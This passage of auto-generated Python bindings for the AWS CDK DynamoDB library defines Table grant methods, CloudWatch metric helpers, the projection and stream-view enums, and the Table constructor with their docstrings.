"""Adds an IAM policy statement associated with this table's stream to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key needs to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (i.e. "dynamodb:DescribeStream", "dynamodb:GetRecords", ...).
"""
return jsii.invoke(self, "grantStream", [grantee, *actions])
@jsii.member(jsii_name="grantStreamRead")
def grant_stream_read(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all stream data read operations for this table's stream: DescribeStream, GetRecords, GetShardIterator, ListStreams.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantStreamRead", [grantee])
@jsii.member(jsii_name="grantTableListStreams")
def grant_table_list_streams(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM Principal to list streams attached to current dynamodb table.
:param grantee: The principal (no-op if undefined).
"""
return jsii.invoke(self, "grantTableListStreams", [grantee])
@jsii.member(jsii_name="grantWriteData")
def grant_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data write operations to this table: BatchWriteItem, PutItem, UpdateItem, DeleteItem.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantWriteData", [grantee])
@jsii.member(jsii_name="metric")
def metric(
self,
metric_name: str,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the number of Errors executing all Lambdas.
:param metric_name: -
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metric", [metric_name, props])
@jsii.member(jsii_name="metricConditionalCheckFailedRequests")
def metric_conditional_check_failed_requests(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the conditional check failed requests.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConditionalCheckFailedRequests", [props])
@jsii.member(jsii_name="metricConsumedReadCapacityUnits")
def metric_consumed_read_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed read capacity units.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConsumedReadCapacityUnits", [props])
@jsii.member(jsii_name="metricConsumedWriteCapacityUnits")
def metric_consumed_write_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed write capacity units.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConsumedWriteCapacityUnits", [props])
@jsii.member(jsii_name="metricSuccessfulRequestLatency")
def metric_successful_request_latency(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the successful request latency.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricSuccessfulRequestLatency", [props])
@jsii.member(jsii_name="metricSystemErrors")
def metric_system_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the system errors.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricSystemErrors", [props])
@jsii.member(jsii_name="metricUserErrors")
def metric_user_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the user errors.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricUserErrors", [props])
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.ProjectionType")
class ProjectionType(enum.Enum):
"""The set of attributes that are projected into the index.
see
:see: https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Projection.html
"""
KEYS_ONLY = "KEYS_ONLY"
"""Only the index and primary keys are projected into the index."""
INCLUDE = "INCLUDE"
"""Only the specified table attributes are projected into the index.
The list of projected attributes is in ``nonKeyAttributes``.
"""
ALL = "ALL"
"""All of the table attributes are projected into the index."""
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.SecondaryIndexProps",
jsii_struct_bases=[],
name_mapping={
"index_name": "indexName",
"non_key_attributes": "nonKeyAttributes",
"projection_type": "projectionType",
},
)
class SecondaryIndexProps:
def __init__(
self,
*,
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
) -> None:
"""Properties for a secondary index.
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
"""
self._values = {
"index_name": index_name,
}
if non_key_attributes is not None:
self._values["non_key_attributes"] = non_key_attributes
if projection_type is not None:
self._values["projection_type"] = projection_type
@builtins.property
def index_name(self) -> str:
"""The name of the secondary index."""
return self._values.get("index_name")
@builtins.property
def non_key_attributes(self) -> typing.Optional[typing.List[str]]:
"""The non-key attributes that are projected into the secondary index.
default
:default: - No additional attributes
"""
return self._values.get("non_key_attributes")
@builtins.property
def projection_type(self) -> typing.Optional["ProjectionType"]:
"""The set of attributes that are projected into the secondary index.
default
:default: ALL
"""
return self._values.get("projection_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SecondaryIndexProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.StreamViewType")
class StreamViewType(enum.Enum):
"""When an item in the table is modified, StreamViewType determines what information is written to the stream for this table.
see
:see: https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_StreamSpecification.html
"""
NEW_IMAGE = "NEW_IMAGE"
"""The entire item, as it appears after it was modified, is written to the stream."""
OLD_IMAGE = "OLD_IMAGE"
"""The entire item, as it appeared before it was modified, is written to the stream."""
NEW_AND_OLD_IMAGES = "NEW_AND_OLD_IMAGES"
"""Both the new and the old item images of the item are written to the stream."""
KEYS_ONLY = "KEYS_ONLY"
"""Only the key attributes of the modified item are written to the stream."""
@jsii.implements(ITable)
class Table(
aws_cdk.core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-dynamodb.Table",
):
"""Provides a DynamoDB table."""
def __init__(
self,
scope: aws_cdk.core.Construct,
id: str,
*,
table_name: typing.Optional[str] = None,
partition_key: "Attribute",
billing_mode: typing.Optional["BillingMode"] = None,
encryption: typing.Optional["TableEncryption"] = None,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
point_in_time_recovery: typing.Optional[bool] = None,
read_capacity: typing.Optional[jsii.Number] = None,
removal_policy: typing.Optional[aws_cdk.core.RemovalPolicy] = None,
replication_regions: typing.Optional[typing.List[str]] = None,
server_side_encryption: typing.Optional[bool] = None,
sort_key: typing.Optional["Attribute"] = None,
stream: typing.Optional["StreamViewType"] = None,
time_to_live_attribute: typing.Optional[str] = None,
write_capacity: typing.Optional[jsii.Number] = None,
) -> None:
"""
:param scope: -
:param id: -
:param table_name: Enforces a particular physical table name. Default:
:param partition_key: Partition key attribute definition.
:param billing_mode: Specify how you are charged for read and write throughput and how you manage capacity. Default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
:param encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``serverSideEncryption`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param encryption_key: External KMS key to use for table encryption. This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``. Default: - If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this property is undefined, a new KMS key will be created and associated with this table.
:param point_in_time_recovery: Whether point-in-time recovery is enabled. Default: - point-in-time recovery is disabled
:param read_capacity: The read capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
:param removal_policy: The removal policy to apply to the DynamoDB Table. Default: RemovalPolicy.RETAIN
:param replication_regions: Regions where replica tables will be created. Default: - no replica tables are created
:param server_side_encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param sort_key: Table sort key attribute definition. Default: no sort key
:param stream: When an item in the table is modified, StreamViewType determines what information is written to the stream for this table. Default: - streams are disabled unless ``replicationRegions`` is specified
:param time_to_live_attribute: The name of TTL attribute. Default: - TTL is disabled
:param write_capacity: The write capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
"""
props = TableProps(
table_name=table_name,
partition_key=partition_key,
billing_mode=billing_mode,
encryption=encryption,
encryption_key=encryption_key,
point_in_time_recovery=point_in_time_recovery,
read_capacity=read_capacity,
removal_policy=removal_policy,
replication_regions=replication_regions,
server_side_encryption=server_side_encryption,
sort_key=sort_key,
stream=stream,
time_to_live_attribute=time_to_live_attribute,
write_capacity=write_capacity,
)
jsii.create(Table, self, [scope, id, props])
@jsii.member(jsii_name="fromTableArn")
@builtins.classmethod
def from_table_arn(
cls, scope: aws_cdk.core.Construct, id: str, table_arn: str
) -> "ITable":
"""Creates a Table construct that represents an external table via table arn.
:param scope: The parent creating construct (usually ``this``).
:param id: The construct's name.
:param table_arn: The table's ARN.
"""
return jsii.sinvoke(cls, "fromTableArn", [scope, id, table_arn])
@jsii.member(jsii_name="fromTableAttributes")
@builtins.classmethod
def from_table_attributes(
cls,
scope: aws_cdk.core.Construct,
id: str,
*,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
global_indexes: typing.Optional[typing.List[str]] = None,
local_indexes: typing.Optional[typing.List[str]] = None,
table_arn: typing.Optional[str] = None,
table_name: typing.Optional[str] = None,
table_stream_arn: typing.Optional[str] = None,
) -> "ITable":
"""Creates a Table construct that represents an external table.
:param scope: The parent creating construct (usually ``this``).
:param id: The construct's name.
:param encryption_key: KMS encryption key, if this table uses a customer-managed encryption key. Default: - no key
:param global_indexes: The name of the global indexes set for this Table. Note that you need to set either this property, or {@link localIndexes}, if you want methods like grantReadData() to grant permissions for indexes as well as the table itself. Default: - no global indexes
:param local_indexes: The name of the local indexes set for this Table. Note that you need to set either this property, or {@link globalIndexes}, if you want methods like grantReadData() to grant permissions for indexes as well as the table itself. Default: - no local indexes
:param table_arn: The ARN of the dynamodb table. One of this, or {@link tableName}, is required. Default: - no table arn
:param table_name: The table name of the dynamodb table. One of this, or {@link tableArn}, is required. Default: - no table name
:param table_stream_arn: The ARN of the table's stream. Default: - no table stream
"""
attrs = TableAttributes(
encryption_key=encryption_key,
global_indexes=global_indexes,
local_indexes=local_indexes,
table_arn=table_arn,
table_name=table_name,
table_stream_arn=table_stream_arn,
)
return jsii.sinvoke(cls, "fromTableAttributes", [scope, id, attrs])
@jsii.member(jsii_name="fromTableName")
@builtins.classmethod
def from_table_name(
cls, scope: aws_cdk.core.Construct, id: str, table_name: str
) -> "ITable":
"""Creates a Table construct that represents an external table via table name.
:param scope: The parent creating construct (usually ``this``).
:param id: The construct's name.
:param table_name: The table's name.
"""
return jsii.sinvoke(cls, "fromTableName", [scope, id, table_name])
@jsii.member(jsii_name="grantListStreams")
@builtins.classmethod
def grant_list_streams(
cls, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM Principal to list all DynamoDB Streams.
:param grantee: The principal (no-op if undefined).
deprecated
:deprecated: Use {@link #grantTableListStreams} for more granular permission
stability
:stability: deprecated
"""
return jsii.sinvoke(cls, "grantListStreams", [grantee])
@jsii.member(jsii_name="addGlobalSecondaryIndex")
def add_global_secondary_index(
self,
*,
partition_key: "Attribute",
read_capacity: typing.Optional[jsii.Number] = None,
sort_key: typing.Optional["Attribute"] = None,
write_capacity: typing.Optional[jsii.Number] = None,
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
) -> None:
"""Add a global secondary index of table.
:param partition_key: The attribute of a partition key for the global secondary index.
:param read_capacity: The read capacity for the global secondary index. Can only be provided if table billingMode is Provisioned or undefined. Default: 5
:param sort_key: The attribute of a sort key for the global secondary index. Default: - No sort key
:param write_capacity: The write capacity for the global secondary index. Can only be provided if table billingMode is Provisioned or undefined. Default: 5
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
"""
props = GlobalSecondaryIndexProps(
partition_key=partition_key,
read_capacity=read_capacity,
sort_key=sort_key,
write_capacity=write_capacity,
index_name=index_name,
non_key_attributes=non_key_attributes,
projection_type=projection_type,
)
return jsii.invoke(self, "addGlobalSecondaryIndex", [props])
@jsii.member(jsii_name="addLocalSecondaryIndex")
def add_local_secondary_index(
self,
*,
sort_key: "Attribute",
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
) -> None:
"""Add a local secondary index of table.
:param sort_key: The attribute of a sort key for the local secondary index.
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
"""
props = LocalSecondaryIndexProps(
sort_key=sort_key,
index_name=index_name,
non_key_attributes=non_key_attributes,
projection_type=projection_type,
)
return jsii.invoke(self, "addLocalSecondaryIndex", [props])
@jsii.member(jsii_name="autoScaleGlobalSecondaryIndexReadCapacity")
def auto_scale_global_secondary_index_read_capacity(
self, index_name: str, *, max_capacity: jsii.Number, min_capacity: jsii.Number
) -> "IScalableTableAttribute":
"""Enable read capacity scaling for the given GSI.
:param index_name: -
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
return
:return: An object to configure additional AutoScaling settings for this attribute
"""
props = EnableScalingProps(max_capacity=max_capacity, min_capacity=min_capacity)
return jsii.invoke(
self, "autoScaleGlobalSecondaryIndexReadCapacity", [index_name, props]
)
@jsii.member(jsii_name="autoScaleGlobalSecondaryIndexWriteCapacity")
def auto_scale_global_secondary_index_write_capacity(
self, index_name: str, *, max_capacity: jsii.Number, min_capacity: jsii.Number
) -> "IScalableTableAttribute":
"""Enable write capacity scaling for the given GSI.
:param index_name: -
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
return
:return: An object to configure additional AutoScaling settings for this attribute
"""
props = EnableScalingProps(max_capacity=max_capacity, min_capacity=min_capacity)
return jsii.invoke(
self, "autoScaleGlobalSecondaryIndexWriteCapacity", [index_name, props]
)
@jsii.member(jsii_name="autoScaleReadCapacity")
def auto_scale_read_capacity(
self, *, max_capacity: jsii.Number, min_capacity: jsii.Number
) -> "IScalableTableAttribute":
"""Enable read capacity scaling for this table.
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
return
:return: An object to configure additional AutoScaling settings
"""
props = EnableScalingProps(max_capacity=max_capacity, min_capacity=min_capacity)
return jsii.invoke(self, "autoScaleReadCapacity", [props])
@jsii.member(jsii_name="autoScaleWriteCapacity")
def auto_scale_write_capacity(
self, *, max_capacity: jsii.Number, min_capacity: jsii.Number
) -> "IScalableTableAttribute":
"""Enable write capacity scaling for this table.
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
return
:return: An object to configure additional AutoScaling settings for this attribute
"""
props = EnableScalingProps(max_capacity=max_capacity, min_capacity=min_capacity)
return jsii.invoke(self, "autoScaleWriteCapacity", [props])
@jsii.member(jsii_name="grant")
def grant(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key needs to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (i.e. "dynamodb:PutItem", "dynamodb:GetItem", ...).
"""
return jsii.invoke(self, "grant", [grantee, *actions])
@jsii.member(jsii_name="grantFullAccess")
def grant_full_access(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits all DynamoDB operations ("dynamodb:*") to an IAM principal.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantFullAccess", [grantee])
@jsii.member(jsii_name="grantReadData")
def grant_read_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data read operations from this table: BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantReadData", [grantee])
@jsii.member(jsii_name="grantReadWriteData")
def grant_read_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal to all data read/write operations to this table.
BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan,
BatchWriteItem, PutItem, UpdateItem, DeleteItem
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantReadWriteData", [grantee])
@jsii.member(jsii_name="grantStream")
def grant_stream(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table's stream to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key needs to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (i.e. "dynamodb:DescribeStream", "dynamodb:GetRecords", ...).
"""
return jsii.invoke(self, "grantStream", [grantee, *actions])
@jsii.member(jsii_name="grantStreamRead")
def grant_stream_read(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all stream data read operations for this table's stream: DescribeStream, GetRecords, GetShardIterator, ListStreams.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantStreamRead", [grantee])
@jsii.member(jsii_name="grantTableListStreams")
def grant_table_list_streams(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM Principal to list streams attached to current dynamodb table.
:param grantee: The principal (no-op if undefined).
"""
return jsii.invoke(self, "grantTableListStreams", [grantee])
@jsii.member(jsii_name="grantWriteData")
def grant_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data write operations to this table: BatchWriteItem, PutItem, UpdateItem, DeleteItem.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantWriteData", [grantee])
@jsii.member(jsii_name="metric")
def metric(
self,
metric_name: str,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Return the given named metric for this Table.
:param metric_name: -
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
